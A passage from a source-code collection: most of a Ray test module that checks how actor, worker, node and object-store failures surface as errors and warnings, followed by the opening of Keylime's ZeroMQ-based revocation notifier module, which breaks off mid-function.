p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
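        # Referencing the array captures it in the function's closure, so the
        # pickled definition exceeds the pickle warning size.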
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
def test_warning_all_tasks_blocked(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
        # With a single CPU, all three actors cannot be scheduled at once.
actors = [Foo.remote() for _ in range(3)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_actor_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
b = Actor.remote() # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_task_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
@ray.remote(num_cpus=1)
def f():
print("f running")
time.sleep(999)
ids = [f.remote()] # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group1) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus)]
assert len(actor_group2) == num_cpus
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
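    # The semaphores choreograph scheduling: every g() must hold a worker
    # before any h()/f() runs, forcing the worker pool to grow past the
    # warning threshold.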
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_period_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
    # This node is killed by SIGKILL; ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
    # This node is killed by SIGKILL; ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
    # This node is killed by SIGTERM; ray_monitor will not mark it as dead again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"automatic_object_spilling_enabled": False})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
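# Sketch (illustrative, not part of the original tests) of the distinction the
# test above exercises: a ref passed as a top-level argument is resolved by
# Ray before the task runs, while a ref inside a container is handed to the
# worker as-is and must be resolved with ray.get.
def _serialized_id_sketch():
    @ray.remote
    def direct(x):
        return x  # Ray already resolved the ref; x is the value 1.

    @ray.remote
    def indirect(refs):
        return ray.get(refs[0])  # The worker resolves the ref itself.

    ref = ray.put(1)
    assert ray.get(direct.remote(ref)) == 1
    assert ray.get(indirect.remote([ref])) == 1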
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
        # Kill the parent node.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
    # Normal in-order actor task retries should work
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
    # Now let's try out-of-order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
    # seqno 3: this will crash the actor because the previous task set
    # should_exit to True.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
cluster.add_node(wait=False, node_manager_port=redis_port)
p = log_pubsub
cnt = 0
# wait for max 10 seconds.
found = False
while cnt < 1000 and not found:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
if data["pid"] == "raylet":
found = any("Failed to start the grpc server." in line
for line in data["lines"])
assert found
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
revocation_notifier.py
|
#!/usr/bin/env python
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2017 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import zmq
import common
import ConfigParser
import json
import crypto
import threading
import functools
import time
import os
import sys
from multiprocessing import Process
import signal
logger = common.init_logging('revocation_notifier')
config = ConfigParser.SafeConfigParser()
config.read(common.CONFIG_FILE)
broker_proc = None
def start_broker():
def worker():
context = zmq.Context(1)
frontend = context.socket(zmq.SUB)
frontend.bind("ipc:///tmp/keylime.verifier.ipc")
frontend.setsockopt(zmq.SUBSCRIBE, "")
# Socket facing services
backend = context.socket(zmq.PUB)
backend.bind("tcp://*:%s"%config.getint('general','revocation_notifier_port'))
zmq.device(zmq.FORWARDER, frontend, backend)
global broker_proc
broker_proc = Process(target=worker)
broker_proc.start()
def stop_broker():
global broker_proc
if broker_proc is not None:
os.kill(broker_proc.pid,signal.SIGKILL)
def notify(tosend):
def worker(tosend):
context = zmq.Context()
mysock = context.socket(zmq.PUB)
mysock.connect("ipc:///tmp/keylime.verifier.ipc")
# wait 100ms for connect to happen
time.sleep(0.1)
        # now send it out via 0mq
for i in range(config.getint('cloud_verifier','max_retries')):
try:
mysock.send(json.dumps(tosend))
break
except Exception as e:
logger.debug("Unable to publish revocation message %d times, trying again in %f seconds: %s"%(i,config.getfloat('cloud_verifier','retry_interval'),e))
time.sleep(config.getfloat('cloud_verifier','retry_interval'))
mysock.close()
cb = functools.partial(worker,tosend)
t = threading.Thread(target=cb)
t.start()
cert_key=None
def await_notifications(callback,revocation_cert_path):
global cert_key
if revocation_cert_path is None:
raise Exception("must specify revocation_cert_path")
context = zmq.Context()
mysock = context.socket(zmq.SUB)
